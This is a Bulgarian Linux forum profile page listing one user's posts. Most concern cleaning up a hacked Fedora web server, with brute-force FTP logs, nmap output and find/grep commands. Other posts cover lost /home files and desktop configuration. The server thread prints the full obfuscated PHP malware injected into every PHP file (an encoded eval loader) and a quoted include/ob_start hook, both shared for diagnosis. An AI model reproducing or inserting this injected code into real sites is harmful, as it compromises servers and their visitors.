Покажи Публикации - mishot
* Виж публикациите на потр. | Виж темите на потр. | Виж прикачените файлове на потр
Страници: [1] 2 3 ... 13
1  Linux секция за напреднали / Хардуерни и софтуерни проблеми / Re: Проблем с файловете в /home -: Nov 09, 2012, 10:00
$ df /home/
Файлова с-ма        1K-блокове     Заети  Свободни Изп% Монтирана на
/dev/sda5            133664740  15992128 110882744  13% /home


Ако опитам да възстановя файловете с някои от тези: ext3grep, foremost,  photorec,
трябва ли дяла да НЕ е монтиран?

Препоръчайте ми и друг инструмент за възстановяване - дяла е ext4
2  Linux секция за напреднали / Хардуерни и софтуерни проблеми / Re: Проблем с файловете в /home -: Nov 08, 2012, 16:11
Потребителя е само един. /home е на отделен диск
3  Linux секция за напреднали / Хардуерни и софтуерни проблеми / Проблем с файловете в /home -: Nov 07, 2012, 15:30
Здравейте,
един колега ми се оплака, че на домашното PC с Debian са му изчезнали всички филми и снимки, като обаче директориите са се запазили.
С две думи, дървото на директориите си стои както си е било, но са празни.
Не помни да е трил нещо, а и няма как без да искаш да си затриеш съдържанието, без самите директории.
Дайте някаква идея, къде може да има нещо описано по логовете, къде да гледаме?
4  Linux секция за напреднали / Хардуерни и софтуерни проблеми / Re: Пробив в сигурността на уеб сървър -: Sep 10, 2012, 15:29

П.П.: Я по-добре с ей такова търсене, че да не изключваш търсене в скрити папки (такива, имената на които започват с точка), а и да махнеш папките от резултата (т.е., да излезе списък само от файлове)
Цитат
find /var/www/html/ -type f -not -name '*.*'
Тук вече ти е позволено да ползваш и относителни пътища, ако искаш.

Това ми свърши перфектна работа!
Хиляди благодарности!
5  Linux секция за напреднали / Хардуерни и софтуерни проблеми / Re: Пробив в сигурността на уеб сървър -: Sep 10, 2012, 11:12
Открих този скрипт, който сканира за потенциален код на webshell(май рови кода за Exploit-и )
Слагам го за всеки, който може да има моя проблем:
6  Linux секция за напреднали / Хардуерни и софтуерни проблеми / Re: Пробив в сигурността на уеб сървър -: Sep 10, 2012, 09:23
това видях засега в лога:
Sep  4 04:39:45 webserver proftpd[21621]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER aaron: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:47 webserver proftpd[21622]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abbott: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:48 webserver proftpd[21623]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abel: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:50 webserver proftpd[21624]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abner: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:52 webserver proftpd[21625]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abraham: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:49 webserver proftpd[23156]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER aaron: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:51 webserver proftpd[23157]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abbott: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:53 webserver proftpd[23158]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abel: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:55 webserver proftpd[23159]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abner: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]

това е част от лога, започват от A-Z(всякакви комбинации)

Имаш ли инсталиран фаил2бан ?

Има fail2ban
Засега сървъра работи коректно и кода не е добавян.

Може ли някой да ми каже как да претърся директорията на уебсървъра(/vaw/www/html) за файлове БЕЗ разширение?
7  Linux секция за напреднали / Хардуерни и софтуерни проблеми / Re: Пробив в сигурността на уеб сървър -: Sep 05, 2012, 15:14
към момента изчистих кода от файловете + спрян FTP + инсталирах mod_secure

продължавам да следя за промени


Благодаря на всички за помощта
8  Linux секция за напреднали / Хардуерни и софтуерни проблеми / Re: Пробив в сигурността на уеб сървър -: Sep 05, 2012, 11:57
това е файла
9  Linux секция за напреднали / Хардуерни и софтуерни проблеми / Re: Пробив в сигурността на уеб сървър -: Sep 05, 2012, 10:49
Няма нужда да се търси 'b33' на този етап - дори да си почистиш кода от тази функция, пак ще ти го добавят. Направо да видим кода (и без това си е публикуван тук), за да говорим нататък
Код
GeSHi (PHP):
  1. if (function_exists('ob_start') && !isset($GLOBALS['mfsn'])) {
  2. $GLOBALS['mfsn'] = '/var/www/html/wizitka/new/templates/vertikalni/5/pharmacy/26f.php';
  3. if (file_exists($GLOBALS['mfsn'])) {
  4. include_once($GLOBALS['mfsn']);
  5. if (function_exists('gml') && function_exists('dgobh')) {
  6. ob_start('dgobh');
  7. }
  8. }
  9. }

Виж какво има в указания файл. Сподели и с нас, ако нямаш някаква пречка. След това ще е нужно здраво да се заровиш в логовете на всички услуги (включително и ssh), които имаш (си имал) пуснати на тази машина, и да се опиташ да намериш къде и с какво се е случило влизането. Някъде имаш оставена вратичка, но ще ни е малко трудно така на сляпо да те упътим къде е.

Няма как да видя какво съдържа файла, защото директорията NEW беше временна, за одобрения на няколко вертикални темплейта и сутринта я затрих, за да не я възстановявам и нея.

това видях засега в лога:
Sep  4 04:39:45 webserver proftpd[21621]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER aaron: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:47 webserver proftpd[21622]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abbott: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:48 webserver proftpd[21623]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abel: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:50 webserver proftpd[21624]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abner: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:52 webserver proftpd[21625]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abraham: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:49 webserver proftpd[23156]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER aaron: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:51 webserver proftpd[23157]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abbott: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:53 webserver proftpd[23158]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abel: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:55 webserver proftpd[23159]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abner: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]

това е част от лога, започват от A-Z(всякакви комбинации)

изхода от nmap:

#  nmap -v 192.168.0.1

Starting Nmap 5.21 ( http://nmap.org ) at 2012-09-05 10:56 EEST
Initiating Parallel DNS resolution of 1 host. at 10:56
Completed Parallel DNS resolution of 1 host. at 10:56, 0.00s elapsed
Initiating SYN Stealth Scan at 10:56
Scanning 192.168.0.1 [1000 ports]
Discovered open port 443/tcp on 192.168.0.1
Discovered open port 111/tcp on 192.168.0.1
Discovered open port 139/tcp on 192.168.0.1
Discovered open port 445/tcp on 192.168.0.1
Discovered open port 80/tcp on 192.168.0.1
Discovered open port 3306/tcp on 192.168.0.1
Discovered open port 3128/tcp on 192.168.0.1
Completed SYN Stealth Scan at 10:56, 0.03s elapsed (1000 total ports)
Nmap scan report for 192.168.0.1
Host is up (0.0000090s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
3128/tcp open  squid-http
3306/tcp open  mysql

До момента съм спрял FTP сървъра и съм забранил всички потребители, които имат отношение.

За да си провериш всички файлове за b33 пробвай това
Код
GeSHi (Bash):
  1. find / -type f -print0 | xargs -0 grep -l "b33"

Има ли как да търси само в php файлове?
Как да видя всички php модифицирани на определена дата?

Благодаря предварително на всички!
10  Linux секция за напреднали / Хардуерни и софтуерни проблеми / Пробив в сигурността на уеб сървър -: Sep 05, 2012, 08:15
Здравейте,
имам следния проблем:
По някакъв начин(още не съм разбрал как) в началото на всеки php файл се добавя следния код:
<?php
$md5 = "0920e84df32218bdeb31c1c2ae0cf0fc";
$a3 = array('(','d',"4",'$','t',";",'c','e','r','l',"z",')',"i",'6','n',"f","b","o",'a','s','g',"_",'v');
$b33 = create_function('$'.'v',$a3[7].$a3[22].$a3[18].$a3[9].$a3[0].$a3[20].$a3[10].$a3[12].$a3[14].$a3[15].$a3[9].$a3[18].$a3[4].$a3[7].$a3[0].$a3[16].$a3[18].$a3[19].$a3[7].$a3[13].$a3[2].$a3[21].$a3[1].$a3[7].$a3[6].$a3[17].$a3[1].$a3[7].$a3[0].$a3[3].$a3[22].$a3[11].$a3[11].$a3[11].$a3[5]);
$b33('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');
?>

Не знам какво точно прави кода, но спира правилната работа на сайтовете.
Вчера възстанових всички сайтове от бекъпа и всичко си работеше добре. Днес сутринта кода беше добавен отново навсякъде.

Някакви идеи как да го спра? Вирус ли е някакъв?
Дайте идея, как да проверя рекурсивно във всички php файлове за, да речем низа b33(да съм сигурен, че кода не е останал някъде)
clamav и rkhunter - не откриват нищо

Сървъра е с Fedora 14, httpd-2.2.17-1

едит:

сега забелязах в логовете, че се опитват да влязат през proftp с различни потребители(някаква база ползват явно, защото потребителите са в азбучен ред) - спрях proftpd
11  Хумор, сатира и забава / Хумор / Re: Смях -: Feb 03, 2012, 15:56
Цитат
Яко [_]3 Тайно обичала Азис ;D

Тони може и да е момче...
12  Linux секция за начинаещи / Настройка на програми / Re: Федора и ъпдейти на ядрото ... -: Jan 25, 2012, 08:54
Днес при проверка за обновления, пакетите kmod-nvidia бяха налични.
13  Linux секция за начинаещи / Настройка на програми / Re: Федора и ъпдейти на ядрото ... -: Jan 24, 2012, 16:01
Досега винаги, когато е имало  ъпдейт и за ядрото, драйверите за нвидия за съответното ядро са се сваляли автоматично(стига да е добавен rpmfusion).
От известно време насам(около месец) тези същите драйвери ги няма при ъпдейта и ако рестартираш с новото ядро - X-са не зарежда. До ден-два след обновяването на ядрото - пускат и драйверите на нвидиа. Не знам защо е това забавяне, но е факт. Преди 3 мин обнових до kernel-3.2.1-3 на Fedora 16 и драйвери няма. Е, не е болка за умиране, утре ще се появят и ще рестартирам тогава.
Дано синхронизират по-скоро, защото е досадно, но ако на човек не му с спешно да зареди новото ядро, спокойно може да изчака ден или два.
14  Linux секция за начинаещи / Настройка на програми / Досаден проблем с gconf-editor -: Jan 13, 2012, 16:01
Ползвам Fedora 16 Gnome-shell.
Когато избера даден фон на екрана(background) той става активен, докато не премина на друг десктоп. Следва автоматична смяна със зададен в ~/.gconf/desktop/gnome/background/%gconf.xml
Колкото и да сменям стойността picture_filename в gconf-editor, мина ли на друг десктоп, то тя става пак тази в ~/.gconf/desktop/gnome/background/%gconf.xml.
Дори изтрих проклетия файл (~/.gconf/desktop/gnome/background/%gconf.xml), но след преминаване на друг десктоп, гадината е пак там и стойността е пак същата. Не мога да си сменя картинката на десктопа... досадно е.
Е, ако променя името на избрания фон с този във gconf.xml става, но не си е работа.
Дайте идея, че много се ядосах и не мога да мисля трезво...

Сега забелязах, че при отворен gconf-editor стойността picture_filename се променя наживо при смяна на виртуалните десктопи

Проблема е решен. wallpapoz е припокривал настройките.
15  Нетехнически теми / Идеи и мнения / Re: Linux -: Oct 11, 2011, 11:07
Ето ти на български:
http://djusitades.com/pic/linuxnag-bg.pdf
Страници: [1] 2 3 ... 13